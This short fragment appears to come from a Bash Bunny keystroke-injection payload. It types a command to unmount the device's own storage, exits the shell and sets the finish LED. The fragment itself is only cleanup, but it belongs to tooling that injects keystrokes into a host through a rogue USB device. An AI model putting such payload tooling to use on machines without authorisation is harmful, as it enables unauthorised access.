[Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH